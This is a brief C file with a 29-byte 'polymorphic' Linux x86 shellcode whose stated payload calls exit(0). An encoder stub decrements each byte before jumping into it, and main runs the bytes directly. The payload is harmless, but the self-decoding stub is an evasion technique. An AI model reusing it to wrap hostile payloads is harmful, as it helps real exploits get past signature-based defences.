// linux/x86 exit(0) polymorphic shellcode - 29 bytes // Febriyanto Nugroho   #include <stdio.h>   char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x24"                   "\x80\x6c\x0e\xff\x01\x80\xe9"                   "\x01\x75\xf6\xeb\x05\xe8\xea"                   "\xff\xff\xff\x6b\x1e\x5a\xce"                   "\x81";   int main(int argc, char **argv) { asm("jmp %0;" : "=m" (shellcode)); }